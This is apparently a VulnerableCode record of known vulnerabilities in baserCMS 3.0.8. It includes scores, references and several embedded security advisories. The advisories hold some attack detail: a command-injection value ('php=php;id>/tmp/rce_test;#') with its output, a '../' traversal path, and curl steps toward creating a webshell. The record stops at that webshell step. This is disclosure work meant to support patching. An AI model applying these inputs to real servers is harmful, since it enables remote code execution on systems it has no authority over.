Lookup for vulnerable packages by Package URL.

Purl pkg:composer/baserproject/basercms@3.0.8
Type composer
Namespace baserproject
Name basercms
Version 3.0.8
Qualifiers
Subpath
Is_vulnerable true
Next_non_vulnerable_version 5.2.3
Latest_non_vulnerable_version 5.2.3
Affected_by_vulnerabilities
0
url VCID-1q79-sxzp-zker
vulnerability_id VCID-1q79-sxzp-zker
summary
OS Command Injection
baserCMS allows a remote attacker with an administrative privilege to execute arbitrary OS commands via unspecified vectors.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-20682
reference_id
reference_type
scores
0
value 0.02357
scoring_system epss
scoring_elements 0.8521
published_at 2026-06-04T12:55:00Z
1
value 0.02357
scoring_system epss
scoring_elements 0.85235
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-20682
1
reference_url https://basercms.net/security/JVN64869876
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN64869876
2
reference_url https://jvn.jp/en/jp/JVN64869876/index.html
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN64869876/index.html
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-20682
reference_id CVE-2021-20682
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-20682
fixed_packages
0
url pkg:composer/baserproject/basercms@4.4.5
purl pkg:composer/baserproject/basercms@4.4.5
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5
aliases CVE-2021-20682, GHSA-g39q-f4rm-85x4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1q79-sxzp-zker
1
url VCID-2u6y-aj6t-7fb1
vulnerability_id VCID-2u6y-aj6t-7fb1
summary
Improper Privilege Management
baserCMS allows remote attackers to bypass access restriction for a content to view a file which is uploaded by a site user via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0573
reference_id
reference_type
scores
0
value 0.00173
scoring_system epss
scoring_elements 0.38572
published_at 2026-06-05T12:55:00Z
1
value 0.00173
scoring_system epss
scoring_elements 0.38483
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0573
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0573
reference_id CVE-2018-0573
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0573
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0573, GHSA-33fq-qm4m-cjw3
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2u6y-aj6t-7fb1
2
url VCID-3new-f12y-8bf9
vulnerability_id VCID-3new-f12y-8bf9
summary
baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE)
### Details
The application's restore function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.

Vector: Malicious ZIP upload + insecure `require_once`

### PoC
1. Restore backup
   ![image](https://github.com/user-attachments/assets/9e59768a-4a8e-472d-aaef-5d54546080f6)
1. Load file shell (insecure `require_once`)
   ![image](https://github.com/user-attachments/assets/8f7919a2-c7f3-4ae1-af6c-1b0057e4ba22)
   ![image](https://github.com/user-attachments/assets/c10ef049-459d-429e-a608-8fb220c3387f)

### Impact
Remote Code Execution (RCE)
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-32957
reference_id
reference_type
scores
0
value 0.00031
scoring_system epss
scoring_elements 0.09459
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-32957
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-32957
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-32957
6
reference_url https://github.com/advisories/GHSA-hv78-cwp4-8r7r
reference_id GHSA-hv78-cwp4-8r7r
reference_type
scores
url https://github.com/advisories/GHSA-hv78-cwp4-8r7r
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2025-32957, GHSA-hv78-cwp4-8r7r
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3new-f12y-8bf9
3
url VCID-4zw8-truk-pugf
vulnerability_id VCID-4zw8-truk-pugf
summary
baserCMS has OS Command Injection Leading to Remote Code Execution (RCE)
## Summary

In the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**.

This vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**.

---

## Vulnerability Information

| Item | Details |
| ---- | ------- |
| CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command |
| Impact | Remote Code Execution (RCE) |
| Severity | Critical |
| Attack Requirements | Administrator privileges required |
| Reproducibility | Reproducible (confirmed multiple times) |
| Test Environment | baserCMS 5.2.2 (Docker / development environment) |

---

## Affected Areas

- **Controller**
  - `PluginsController::get_core_update()`
- **Service**
  - `PluginsService::getCoreUpdate()`
- **Affected Endpoint**
  - `/baser/admin/baser-core/plugins/get_core_update`

---

## Technical Details

### Vulnerable Code Flow

```text
PluginsController::get_core_update()
  ↓ Retrieves php parameter from POST data
PluginsService::getCoreUpdate($targetVersion, $php, $force)
  ↓ Concatenates $php into command string without validation or escaping
exec($command)
```

### Relevant Code (Excerpt)

**PluginsController.php**

```php
$service->getCoreUpdate(
    $request->getData('targetVersion') ?? '',
    $request->getData('php') ?? 'php',
    $request->getData('force'),
);
```

**PluginsService.php**

```php
$command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .
           $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';

exec($command, $out, $code);
```

The `$php` parameter is user input, and **none** of the following countermeasures are in place:

- Restriction via allowlist
- Validation via regular expression
- Escaping via `escapeshellarg()` or similar

---

## Attack Scenario

1. The attacker logs in as a CMS administrator
2. Sends a POST request to the core update functionality in the admin panel
3. Specifies a string containing OS commands in the `php` parameter
4. `exec()` is executed on the server side, running the arbitrary OS command

### Example Attack Input (Conceptual)

```text
php=php;id>/tmp/rce_test;#
```

---

## Verification Results (PoC)

### Execution Result

```bash
$ docker exec bc-php cat /tmp/rce_test
uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)
```

The above confirms that OS commands can be executed with `www-data` privileges.

### Additional Notes

- Reproducible through the legitimate flow in the admin panel (browser)
- Succeeds even with CSRF/FormProtection tokens included in a legitimate request
- Failure cases (400/403) have also been investigated and differentiated
- Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)

---

## Impact

If this vulnerability is exploited, the following becomes possible:

- Retrieval of server information
- Reading/writing arbitrary files
- Retrieval of application configuration information (DB credentials, etc.)
- OS-level operations beyond application permission boundaries

Although administrator privileges are required, **this is a design issue where the impact extends from the application layer to the OS layer**, and the impact is considered significant.

---

## Recommended Fix

### Primary Recommendation

- Do not accept the PHP executable path from user input
- Fix the PHP executable on the server side using the `PHP_BINARY` constant

```php
$php = escapeshellarg(PHP_BINARY);
```

### Supplementary Fix Recommendations

- Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well
- If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)

### Alternative (Not Recommended)

- Allowlist validation for the PHP executable path
- Combined use of regex validation and `escapeshellarg()`

However, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**.

---

## Additional Notes

- This issue is independent of UI display controls (showing/hiding buttons)
- As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed
- This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone

---

## Conclusion

Due to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.

This advisory was translated from Japanese to English using GitHub Copilot.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-21861
reference_id
reference_type
scores
0
value 0.00131
scoring_system epss
scoring_elements 0.32198
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-21861
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-21861
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-21861
6
reference_url https://github.com/advisories/GHSA-qxmc-6f24-g86g
reference_id GHSA-qxmc-6f24-g86g
reference_type
scores
url https://github.com/advisories/GHSA-qxmc-6f24-g86g
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-21861, GHSA-qxmc-6f24-g86g
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4zw8-truk-pugf
4
url VCID-5ay3-1t5g-vycu
vulnerability_id VCID-5ay3-1t5g-vycu
summary
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
BaserCMS is an open source content management system with a focus on Japanese language support. Users with upload privilege may upload crafted zip files capable of path traversal on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-41279
reference_id
reference_type
scores
0
value 0.00438
scoring_system epss
scoring_elements 0.6349
published_at 2026-06-05T12:55:00Z
1
value 0.00438
scoring_system epss
scoring_elements 0.63447
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-41279
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-41279
reference_id CVE-2021-41279
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-41279
4
reference_url https://github.com/advisories/GHSA-4x2f-54wr-4hjg
reference_id GHSA-4x2f-54wr-4hjg
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4x2f-54wr-4hjg
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg
reference_id GHSA-4x2f-54wr-4hjg
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg
fixed_packages
0
url pkg:composer/baserproject/basercms@4.5.4
purl pkg:composer/baserproject/basercms@4.5.4
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4
aliases CVE-2021-41279, GHSA-4x2f-54wr-4hjg
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5ay3-1t5g-vycu
5
url VCID-6trr-5deb-yydm
vulnerability_id VCID-6trr-5deb-yydm
summary
Unrestricted Upload of File with Dangerous Type
baserCMS allows remote attackers with a site operator privilege to upload arbitrary files.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0571
reference_id
reference_type
scores
0
value 0.00167
scoring_system epss
scoring_elements 0.37611
published_at 2026-06-05T12:55:00Z
1
value 0.00167
scoring_system epss
scoring_elements 0.37518
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0571
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0571
reference_id CVE-2018-0571
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0571
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0571, GHSA-3mcp-6rv6-c69g
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6trr-5deb-yydm
6
url VCID-7x3n-4c2b-nfbx
vulnerability_id VCID-7x3n-4c2b-nfbx
summary
baserCMS has OS command injection vulnerability in installer
baserCMS has an OS command injection vulnerability in the installer.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability

If baserCMS is placed on a server but not installed, malicious commands may be executed.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information.
https://basercms.net/security/JVN_54513170

### Credits

REN XINGDIAN
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30880
reference_id
reference_type
scores
0
value 0.00055
scoring_system epss
scoring_elements 0.17526
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30880
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30880
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30880
6
reference_url https://github.com/advisories/GHSA-6hpg-8rx3-cwgv
reference_id GHSA-6hpg-8rx3-cwgv
reference_type
scores
url https://github.com/advisories/GHSA-6hpg-8rx3-cwgv
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30880, GHSA-6hpg-8rx3-cwgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7x3n-4c2b-nfbx
7
url VCID-891u-x525-ykbb
vulnerability_id VCID-891u-x525-ykbb
summary
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
There is a Potential Zip Slip Vulnerability and OS Command Injection Vulnerability on the management system of baserCMS. Users with permissions to upload files may upload crafted zip files which may execute arbitrary commands on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are eligible, please update to the new version as soon as possible.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-41243
reference_id
reference_type
scores
0
value 0.02799
scoring_system epss
scoring_elements 0.86405
published_at 2026-06-05T12:55:00Z
1
value 0.02799
scoring_system epss
scoring_elements 0.86382
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-41243
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-41243
reference_id CVE-2021-41243
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-41243
4
reference_url https://github.com/advisories/GHSA-7rpc-9m88-cf9w
reference_id GHSA-7rpc-9m88-cf9w
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7rpc-9m88-cf9w
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w
reference_id GHSA-7rpc-9m88-cf9w
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w
fixed_packages
0
url pkg:composer/baserproject/basercms@4.5.4
purl pkg:composer/baserproject/basercms@4.5.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-ays7-6wvh-augt
6
vulnerability VCID-d1sf-cmct-zbh1
7
vulnerability VCID-g56w-z9cx-5ygv
8
vulnerability VCID-ggv8-3v9t-mfea
9
vulnerability VCID-j37y-gws9-ake9
10
vulnerability VCID-jby7-s5ez-dqb3
11
vulnerability VCID-k575-suuf-7bhf
12
vulnerability VCID-k5qv-4yp3-zbgf
13
vulnerability VCID-khft-xvrw-g3dr
14
vulnerability VCID-kmpp-6j49-pqfz
15
vulnerability VCID-mfm9-gsh3-ubg8
16
vulnerability VCID-nxrf-64er-xbfx
17
vulnerability VCID-p695-t9ye-v3ga
18
vulnerability VCID-pd8c-9d7z-zkhg
19
vulnerability VCID-sqr4-v889-tff8
20
vulnerability VCID-u16w-rbuk-ybfs
21
vulnerability VCID-uedz-j2vn-cbea
22
vulnerability VCID-y2sz-c6vb-pkdp
23
vulnerability VCID-zqd4-rdem-jfgk
24
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4
aliases CVE-2021-41243, GHSA-7rpc-9m88-cf9w
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-891u-x525-ykbb
8
url VCID-8buz-nsr9-3yge
vulnerability_id VCID-8buz-nsr9-3yge
summary
baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API
## Summary

A path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write.

An authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).

## Affected Code

**File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php`

```php
public function getFullpath(string $theme, string $plugin, string $type, string $path)
{
    // ...
    return $viewPath . $type . DS . $path;  // $path is not sanitized
}
```

## Attack Scenario

1. The attacker compromises an administrator account (password leak, brute force, etc.)
2. Obtains an access token via API login
3. Specifies `path: "../../../../webroot/"` in the theme file creation API
4. A PHP file is created in the webroot
5. The attacker accesses the created PHP file to achieve RCE

## Reproduction Steps

```bash
# 1. Login
curl -X POST "http://target/baser/api/admin/baser-core/users/login.json" \
  -H "Content-Type: application/json" \
  -d '{"email":"admin@example.com","password":"password"}'

# 2. Create webshell
